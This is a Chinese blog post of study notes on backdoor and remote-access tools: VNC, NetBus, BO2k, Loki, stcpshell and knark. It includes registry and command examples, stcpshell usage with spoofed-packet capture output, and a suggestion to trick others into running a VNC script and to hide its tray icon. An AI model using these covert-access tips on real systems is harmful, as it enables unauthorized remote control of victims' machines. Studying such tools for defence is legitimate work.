§10 后门和远程访问工具-oychw-ChinaUnix博客

雪峰磁针石测试 linux pythontesting.blog.chinaunix.net

首页　| 　博文目录　| 　关于我

oychw

博客访问： 19882260
博文数量： 679
博客积分： 10495
博客等级：上将
技术积分： 9308
用户组：普通用户
注册时间： 2006-07-18 10:51

文章分类

全部博文（679）

@python（115）

python 标准库（1）

测试（2）

其他（17）

python核心编程（0）

python 模块（0）

python本质参考（3）

python 并发（0）

实例（24）

pexpect（5）

《使用python进行（5）

Robot Framework （43）

python 从入门到（13）
测试新闻（5）
软件水平考试（15）

教程（12）

软件评测师（2）
@network（5）

抓包工具（0）

计算机网络第四（3）
@socity（36）

地理（1）

cctv7（1）

国学（2）

散文（2）

财经（3）

健康（11）

life（2）

卡耐基人际关系学（11）

history（1）
Windows（10）

终端服务（2）

深入解析Windows（6）
@mysql（29）

mysql cluster（5）

Mysql 教程（19）
@LINUX（148）

ubuntu（2）

?哥的 Linux 私房（0）

Unix 和 Linux 自（3）

linux 内核（6）

学习bash shell （3）

shell实例（1）

sed（1）

编辑命令（0）

linux 安全（0）

文件系统（1）

硬盘相关（4）

running linux（7）

Linux 程序设计入（36）

Linux基础教程（1（8）

linux 基础（0）

linux 业界（2）

性能监控（1）

Linux 命令（11）

Linux 文件系统（7）

Linux 简介（9）

linux 使用（4）

@LINUX SERVICE（4）

高效awk编程第3版（3）

实例讲解unix she（1）

LINUX与UNIX SHEL（15）

shell（10）
test（77）

功能测试（2）

质量模型（0）

软件测试的艺术（5）

测试文档（12）

测试基础理论（11）

软件测试基础教程（0）

Jmeter（2）

测试工具（1）

Web 安全测试 Coo（3）

测试面试（1）

性能测试（9）

软件测试第2版（13）
automation（26）

sikuli（3）

selenium（0）

手册（0）

Testcomplete（2）

学习perl（1）

TCL 教程英文版（7）

实战Tcl和TK程序（5）

expect 实例（1）
computer（28）

c（8）

21天学通Java 6（4）

java（1）

Cisco IOS Cookbo（0）

network（10）
it（4）
joke（4）
linux_unix（28）

linux security （2）

硬件相关（2）

Secure Shell 2nd（1）

linux unix性能工（2）
society（84）

一夜风流（2）

@health（1）

法律（3）

sex（1）

励志（1）

english（1）

plan & summary（8）

job（2）

security（10）

economic（17）

health（9）
未分配的博文（65）

文章存档

2012年（5）

2011年（38）

2010年（86）

2009年（145）

2008年（170）

2007年（165）

2006年（89）

我的朋友

后门和远程访问工具

本章中的多数工具有过久的嫌疑，还需要及时跟踪相关网站。

由AT&T实验室开发，。由服务器和客户端组成，同时VNC还有web server的方式。

多数杀毒软件把VNC当作正常软件。

Windows中VNC web server的默认端口5800，VNC 5900.如果设置为1，则对应5801和5901端口。访问举例：。4.1版本中可以让本地用户选择是否允许远程接入，访问控制也可以基于IP或一个网段。收费版本还支持windows域的集成。

密码设置如下：

[HKEY_CURRENT_USER\Software\RealVNC\WinVNC4]

"Password"=hex:15,0a,44,88,72,71,ba,9

命令行下添加：

C:\>reg export HKCU\Software\RealVNC\WinVNC4 vnc.txt

The operation completed successfully.

C:\>type vnc.txt

Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\RealVNC\WinVNC4]

"Password"=hex:15,0a,44,88,72,71,ba,90

你可以写个脚本，然后勾引它人执行。脚本见教材中的图片。另外还可以通过修改源码方式去掉桌面右下角显示的图标。

Unix下面更简单，任何用户都可以执行。不过非root用户不能使用80端口等1024以下的端口。

比如：

# /usr/X11R6/bin/vncserver

You will require a password to access your desktops.

Password:

Verify:

Would you like to enter a view-only password (y/n)? n

xauth: creating new authority file /root/.Xauthority

New 'X' desktop is KGS-87-14:2

Creating default startup script /root/.vnc/xstartup

Starting applications specified in /root/.vnc/xstartup

Log file is /root/.vnc/KGS-87-14:2.log

通过netstat可以看到监听端口是5802，可以这样访问：

# netstat -anp | grep -i vnc

tcp 0 0 0.0.0.0:5802 0.0.0.0:* LISTEN 20682/Xvnc

tcp 0 0 0.0.0.0:5902 0.0.0.0:* LISTEN 20682/Xvnc

tcp 0 0 0.0.0.0:6002 0.0.0.0:* LISTEN 20682/Xvnc

tcp 0 0 :::6002 :::* LISTEN 20682/Xvnc

unix 2 [ ACC ] STREAM LISTENING 32713 20682/Xvnc /tmp/.X11-unix/X2

unix 3 [ ] STREAM CONNECTED 32734 20682/Xvnc /tmp/.X11-unix/X2

unix 3 [ ] STREAM CONNECTED 32732 20682/Xvnc /tmp/.X11-unix/X2

NETBUS的图形不如VNC友好，主要针对黑客应用。很多杀毒软件不允许它存在。它也很难高效率的使用。在很多安全网站都有下载，比如：http://www.packetstormsecurity.org。这里不做详细介绍，参见教材。

Back Orifice 2000 (BO2k)是Netbus的下一代后门访问工具,不过这个工具依然被多数杀毒软件拒绝。

可以在以下地址下载：

http://www.packetstormsecurity.com and http://www.securityfocus.com.

最新版本：可以在找到。

在windows 2003上面运行好像有一定的问题，这里不详细介绍，参见教材。

教程参见：

它的fingerprint呈现乱象，能越过一些杀毒软件。远程控制功能和Netbus and BO2k类似。下载地址：http://www.packetstormsecurity.org，等。俺是从这里下载的：。

工具的主页地址：

§10.5 LOKI

Loki利用icmp，下载：http://www.packetstormsecurity.org

特征：出现较大的ICMP包，使用固定的ICMP sequence number和ICMP Ping reply。

以下部分略

§10.6 STCPSHELL

利用TCP欺骗

# gcc -o stcpshell stcpshell.c

比如在服务器端执行：./stcpshell –s

客户端执行：./stcpshell -c -si 10.50.48.16 -ci 10.50.44.89

抓包的结果：

# tcpdump | grep 207.46.

tcpdump: verbose output suppressed, use -v or -vv for full protocol decode

listening on eth0, link-type EN10MB (Ethernet), capture size 96 bytes

10:50:11.267702 IP 207.46.131.137.1234 > 10.50.48.16.rwhois: . 171060313:171060354(41) win 40871

10:50:11.270461 IP 207.46.131.137.rwhois > 10.50.44.89.1234: . 1375898480:1375898570(90) win 36097

10:50:11.270472 IP 207.46.131.137.rwhois > 10.50.44.89.1234: . 3440991056:3440991160(104) win 42831

10:50:11.270482 IP 207.46.131.137.rwhois > 10.50.44.89.1234: . 1535340155:1535340248(93) win 40372

10:50:11.270491 IP 207.46.131.137.rwhois > 10.50.44.89.1234: . 1320783922:1320784015(93) win 33749

10:50:11.270501 IP 207.46.131.137.rwhois > 10.50.44.89.1234: . 3036454421:3036454522(101) win 20896

10:50:11.270511 IP 207.46.131.137.rwhois > 10.50.44.89.1234: . 3886074393:3886074496(103) win 1317

10:50:11.270523 IP 207.46.131.137.rwhois > 10.50.44.89.1234: . 1311279958:1311280030(72) win 31919

10:50:11.270535 IP 207.46.131.137.rwhois > 10.50.44.89.1234: . 4227081789:4227081894(105) win 49784

10:50:11.270544 IP 207.46.131.137.rwhois > 10.50.44.89.1234: . 1333404956:1333405038(82) win 38769

10:50:11.270553 IP 207.46.131.137.rwhois > 10.50.44.89.1234: . 1052880903:1052880936(33) win 39064

10:50:11.270565 IP 207.46.131.137.rwhois > 10.50.44.89.1234: . 894260252:894260342(90) win 12062

10:50:11.270574 IP 207.46.131.137.rwhois > 10.50.44.89.1234: . 3002324501:3002324605(104) win 54439

10:50:11.270586 IP 207.46.131.137.rwhois > 10.50.44.89.1234: . 642279503:642279596(93) win 14237

10:50:11.270594 IP 207.46.131.137.rwhois > 10.50.44.89.1234: . 1019367452:1019367534(82) win 11787

10:50:11.270602 IP 207.46.131.137.rwhois > 10.50.44.89.1234: . 2864369021:2864369054(33) win 26215

10:50:11.270612 IP 207.46.131.137.rwhois > 10.50.44.89.1234: . 702565164:702565234(70) win 22597

10:50:11.270621 IP 207.46.131.137.rwhois > 10.50.44.89.1234: . 4038513002:4038513080(78) win 20380

10:50:11.270631 IP 207.46.131.137.rwhois > 10.50.44.89.1234: . 3895738653:3895738726(73) win 50316

10:50:11.270640 IP 207.46.131.137.rwhois > 10.50.44.89.1234: . 4088035641:4088035724(83) win 12523

10:50:11.270648 IP 207.46.131.137.rwhois > 10.50.44.89.1234: . 93527158:93527257(99) win 35281

10:50:11.270667 IP 207.46.131.137.rwhois > 10.50.44.89.1234: . 3245275253:3245275354(101) win 44038

10:50:11.270676 IP 207.46.131.137.rwhois > 10.50.44.89.1234: . 3658560846:3658560915(69) win 6828

10:50:11.270687 IP 207.46.131.137.rwhois > 10.50.44.89.1234: . 2148769387:2148769492(105) win 11225

10:50:11.270695 IP 207.46.131.137.rwhois > 10.50.44.89.1234: . 2199832619:2199832652(33) win 7459

10:50:11.270722 IP 207.46.131.137.rwhois > 10.50.44.89.1234: . 1841260883:1841260929(46) win 46908

可以修改伪造的IP：

    /* from  .. you BETTER change this */

    pkt.ip.ip_src.s_addr=inet_addr("207.46.131.137");

§10.6 KNARK

本工具只针对linux 2.2的内核，略

阅读(10466) | 评论(0) | 转发(0) |

上一篇：新概念英语第二册第22课: A glass envelope

下一篇：新概念英语第二册第20课: One man in boat

给主人留下些什么吧！~~

感谢所有关心和支持过ChinaUnix的朋友们

16024965号-6